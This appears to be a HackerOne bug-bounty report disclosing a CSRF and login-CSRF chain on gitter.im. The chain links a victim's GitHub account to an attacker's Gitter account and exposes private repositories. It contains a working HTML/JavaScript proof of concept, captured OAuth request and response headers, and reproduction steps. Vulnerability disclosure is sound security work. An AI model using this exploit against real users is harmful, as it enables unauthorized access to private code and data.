CSRF - Disclose GitHub private (repositories, issues, pulls, etc..) - via /login/upgrade?scopes=repo
HackerOne report #471259 by yipman
on 2018-12-22, assigned to dappelt
:
Summary:
I have found CSRF allow me to connect my account (attacker account) with victim github account, that allow to the attacker to see all private github (repositories, issues, pulls, etc..), and allow him to do everything he can do it using gitter.im.
Description:
I found this url: https://gitlab.com/gitlab-org/gitter/webapp/blob/develop/docs/oauth-scopes.md#private-repositories and i see this url (https://gitter.im/login/upgrade?scopes=repo) can use it to connect with github, then after connect i can access private (repositories, issues, pulls, etc..), So i searched how i can connect victim Github account
with my Gitter account
, and i found:
- This url: https://gitter.im/login/upgrade?scopes=repo, without token, so i can use it as CSRF!
- To link my account with victim
Github account
should myGitter account
logged in, in victim browser, Because in the victim browser hisGithub account
already logged in and already have to auto connect with gitter app! - So i searched, for login my account in victim browser, and i found i can use login via gitlab as
Login CSRF
, you can see that in POC and the Video😊 - Then i can create Javascript+HTML to do all this things in the same time!
NOTE: Should the victim already connected with github before, and i think the most users in (gitter) already use (github)!
POC:
Index.html
<html>
<head>
<script type="text/javascript">
window.open("https://gitter.im/login/gitlab/callback?code=your_code");
</script>
<script>
function myFunction() {
setTimeout(function(){ window.location.href = "https://gitter.im/login/upgrade?scopes=repo"; }, 3000);
}
window.onload = myFunction();
</script>
window.open("https://gitter.im/login/gitlab/callback?code=your_code");
to your code, you can get your code via:
NOTE: Don't forget change this in code:
Or if you want see, all request:
Request Headers:
GET /oauth/authorize?response_type=code&redirect_uri=https%3A%2F%2Fgitter.im%2Flogin%2Fgitlab%2Fcallback&scope=read_user%20api&client_id=e2803ae4f09cebdcff56813a0bfbb1a4f0b187355b509eb6d5367a07ad523762 HTTP/1.1
Host: gitlab.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: https://gitter.im/
Connection: close
Cookie: your_cookies
Upgrade-Insecure-Requests: 1
Response Headers:
HTTP/1.1 302 Found
Server: nginx
Date: Sat, 22 Dec 2018 17:04:38 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 175
Connection: close
Cache-Control: no-cache
Location: https://gitter.im/login/gitlab/callback?code=xxx
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-Request-Id: DQ4zsvAVyQ3
X-Runtime: 0.094901
X-Xss-Protection: 1; mode=block
Strict-Transport-Security: max-age=31536000
Content-Security-Policy: object-src 'none'; worker-src https://assets.gitlab-static.net https://gl-canary.global.ssl.fastly.net https://gitlab.com blob:; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://assets.gitlab-static.net https://gl-canary.global.ssl.fastly.net https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ https://apis.google.com; style-src 'self' 'unsafe-inline' https://assets.gitlab-static.net https://gl-canary.global.ssl.fastly.net; img-src * data: blob:; frame-src 'self' https://www.google.com/recaptcha/ https://content.googleapis.com https://content-compute.googleapis.com https://content-cloudbilling.googleapis.com https://content-cloudresourcemanager.googleapis.com https://*.codesandbox.io; frame-ancestors 'self'; connect-src 'self' https://assets.gitlab-static.net https://gl-canary.global.ssl.fastly.net wss://gitlab.com https://sentry.gitlab.net https://customers.gitlab.com https://snowplow.trx.gitlab.net
<html><body>You are being <a href="https://gitter.im/login/gitlab/callback?code=xxx">redirected</a>.</body></html>
Steps To Reproduce:
In this steps, i tell you how you can reproduce this exploit, So i told you what already the victim did before!
- As attacker: Create new account in gitter.im via gitlab(Sign in with Gitlab),
- As victim: create new account in gitter.im and create github account(if you didn't have one!)
- As victim: Login to your account, then connect to your github account via this url: https://gitter.im/login/upgrade?scopes=repo
- As attacker: Open your
burp suite
or any other proxy tools, and open another browser, then login to your attacker gitlab account, then go to gitter.im and open your proxy as video (intercept is on), then click on (Sing in with Gitlab), like the video take the response has gitlab oauth code, likeResponse Headers
in POC, and put this url or change the code value to POC html file, like the video! - As attacker: Just open the url or the file in browser victim, and you can see, your
Gitter account
logged in and victimGithub account
connected with yourGitter account
, you can login to your account as attacker from any where and you can see, victim (repositories, issues, pulls, etc..)😇
Supporting Material/References:
Screencast_12-22-2018_04_03_35_PM.webm
NOTE: I am sorry if my english bad or the report not clear :(
🙂 😇
If you encounter any problem, or do not understand anything, tell me, Please do not judge anything if you do not understand it before asking me Thanks
Impact
- Disclose private github account!
- Can access private (repositories, issues, pulls, etc..)
Attachments
Warning: Attachments received through HackerOne, please exercise caution!